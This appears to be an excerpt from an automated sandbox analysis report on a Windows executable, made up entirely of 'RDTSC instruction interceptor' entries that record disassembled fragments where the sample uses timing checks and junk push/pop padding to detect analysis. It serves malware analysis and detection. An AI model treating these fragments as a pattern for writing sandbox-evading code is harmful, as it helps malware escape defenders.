              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD218 second address: BDD21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD758 second address: BDD762 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD762 second address: BDD76C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0B48B8DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD76C second address: BDD774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD774 second address: BDD77E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B48B8DEF6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD77E second address: BDD795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F2Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD795 second address: BDD7A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD934 second address: BDD948 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0B48765F28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c js 00007F0B48765F26h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDD948 second address: BDD94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1BA second address: BDE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1BE second address: BDE1CA instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0B48B8DEE6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BDE1CA second address: BDE1D5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F0B48765F26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE168E second address: BE16A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ebx 0x00000006 jmp 00007F0B48B8DEF2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE16A8 second address: BE16B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push edi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B60B01 second address: B60B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CCA second address: BE6CCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CCE second address: BE6CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CD6 second address: BE6CDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6CDC second address: BE6CF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48B8DEF4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6E66 second address: BE6E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE70FE second address: BE7104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7104 second address: BE710E instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE710E second address: BE712B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEECh 0x00000007 jne 00007F0B48B8DEE8h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE712B second address: BE7155 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B48765F26h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 jnc 00007F0B48765F37h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7155 second address: BE715B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE766A second address: BE7670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7670 second address: BE7674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE7674 second address: BE767F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE767F second address: BE7693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0B48B8DEE6h 0x0000000a pop edi 0x0000000b pushad 0x0000000c jng 00007F0B48B8DEE6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC06B second address: BEC076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC076 second address: BEC07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB1B8C second address: B8ECEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jg 00007F0B48765F26h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007F0B48765F2Ah 0x00000016 lea eax, dword ptr [ebp+124858FCh] 0x0000001c mov dword ptr [ebp+1244DDADh], edx 0x00000022 push eax 0x00000023 jne 00007F0B48765F38h 0x00000029 mov dword ptr [esp], eax 0x0000002c adc cl, 00000027h 0x0000002f call dword ptr [ebp+122D58B3h] 0x00000035 jnl 00007F0B48765F38h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2084 second address: 9FFB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0B48B8DEF3h 0x0000000f nop 0x00000010 mov di, ax 0x00000013 movzx edi, di 0x00000016 push dword ptr [ebp+122D0BD9h] 0x0000001c sub dx, 3D2Fh 0x00000021 call dword ptr [ebp+122D1A63h] 0x00000027 pushad 0x00000028 add dword ptr [ebp+122D1B47h], ebx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1C6Bh], edx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007F0B48B8DEF3h 0x0000003f mov dword ptr [ebp+122D36CAh], eax 0x00000045 stc 0x00000046 stc 0x00000047 mov esi, 0000003Ch 0x0000004c jmp 00007F0B48B8DEF2h 0x00000051 add esi, dword ptr [esp+24h] 0x00000055 add dword ptr [ebp+122D1AE6h], edx 0x0000005b lodsw 0x0000005d or dword ptr [ebp+122D1AE6h], eax 0x00000063 add eax, dword ptr [esp+24h] 0x00000067 jmp 00007F0B48B8DEF7h 0x0000006c jmp 00007F0B48B8DEF3h 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 mov dword ptr [ebp+122D1B6Ah], eax 0x0000007b push eax 0x0000007c push ebx 0x0000007d push esi 0x0000007e push eax 0x0000007f push edx 0x00000080 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB21F6 second address: BB21FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB21FA second address: BB2219 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push esi 0x0000000d jnc 00007F0B48B8DEE8h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2219 second address: BB221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB221E second address: BB2246 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jo 00007F0B48B8DEE6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d jne 00007F0B48B8DEE8h 0x00000013 push 8B519EB0h 0x00000018 je 00007F0B48B8DEF2h 0x0000001e jbe 00007F0B48B8DEECh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB22FA second address: BB230E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp], esi 0x00000009 mov ecx, dword ptr [ebp+122D17F4h] 0x0000000f nop 0x00000010 push esi 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB230E second address: BB231F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F0B48B8DEE6h 0x0000000a popad 0x0000000b pop esi 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2405 second address: BB2455 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jne 00007F0B48765F26h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0B48765F34h 0x00000013 pop edx 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F0B48765F34h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 jmp 00007F0B48765F2Eh 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2455 second address: BB245A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB254B second address: BB2556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B48765F26h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2672 second address: BB2676 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2676 second address: BB267C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB267C second address: BB26F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0B48B8DEEFh 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F0B48B8DEE8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a sub dword ptr [ebp+12468870h], esi 0x00000030 push 00000004h 0x00000032 mov dword ptr [ebp+122D29BCh], edx 0x00000038 nop 0x00000039 jng 00007F0B48B8DEF8h 0x0000003f push eax 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB26F5 second address: BB26FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2A76 second address: BB2AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007F0B48B8DEE6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 sub eax, dword ptr [ebp+122D2C8Bh] 0x00000018 mov esi, 415D4E5Ah 0x0000001d popad 0x0000001e push 0000001Eh 0x00000020 mov cx, DA73h 0x00000024 pushad 0x00000025 mov dword ptr [ebp+122D33F2h], eax 0x0000002b mov al, A5h 0x0000002d popad 0x0000002e push eax 0x0000002f pushad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2B8B second address: BB2B91 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB26E4 second address: BB26F5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2D97 second address: BB2D9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2E4F second address: BB2E66 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0B48B8DEECh 0x00000008 jg 00007F0B48B8DEE6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2E66 second address: BB2E70 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B48765F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB2E70 second address: BB2EDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48B8DEF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F0B48B8DEE8h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov edi, ebx 0x00000026 mov dh, B8h 0x00000028 lea eax, dword ptr [ebp+12485940h] 0x0000002e mov dword ptr [ebp+122D1B4Dh], esi 0x00000034 mov ecx, dword ptr [ebp+122D397Ah] 0x0000003a nop 0x0000003b jmp 00007F0B48B8DEF3h 0x00000040 push eax 0x00000041 js 00007F0B48B8DEEEh 0x00000047 push ebx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB498 second address: BEB4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB4A6 second address: BEB4AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB4AA second address: BEB4AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB630 second address: BEB634 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEB634 second address: BEB64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F0B48765F2Eh 0x0000000e jno 00007F0B48765F26h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA7B second address: BEBA81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA81 second address: BEBA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA85 second address: BEBA91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F0B48B8DEE6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA91 second address: BEBA97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA97 second address: BEBA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEBA9D second address: BEBAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEF7DD second address: BEF7E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3E72 second address: BF3EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F0B48765F34h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F0B48765F2Ah 0x00000011 jmp 00007F0B48765F37h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4313 second address: BF4319 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4319 second address: BF4329 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0B48765F32h 0x00000008 jne 00007F0B48765F26h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4484 second address: BF4488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4488 second address: BF448E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF45B0 second address: BF45B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF45B6 second address: BF45BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF45BA second address: BF45CE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0B48B8DEE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jp 00007F0B48B8DEE6h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF46CE second address: BF46E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b pop esi 0x0000000c jns 00007F0B48765F26h 0x00000012 pop eax 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4990 second address: BF4995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4AFF second address: BF4B1B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F0B48765F2Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007F0B48765F26h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4FAF second address: BF4FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0B48B8DEE6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF4FB9 second address: BF4FBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3885 second address: BF3889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF3889 second address: BF38A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B48765F34h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF38A3 second address: BF38A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF38A9 second address: BF38AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF38AF second address: BF38B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF38B3 second address: BF38B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF6C63 second address: BF6C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8C33 second address: BF8C3F instructions: 0x00000000 rdtsc 0x00000002 jp 00007F0B48765F26h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8C3F second address: BF8C44 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8D8D second address: BF8DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B48765F36h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8DA9 second address: BF8DB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8DB2 second address: BF8DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF8DB6 second address: BF8DBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
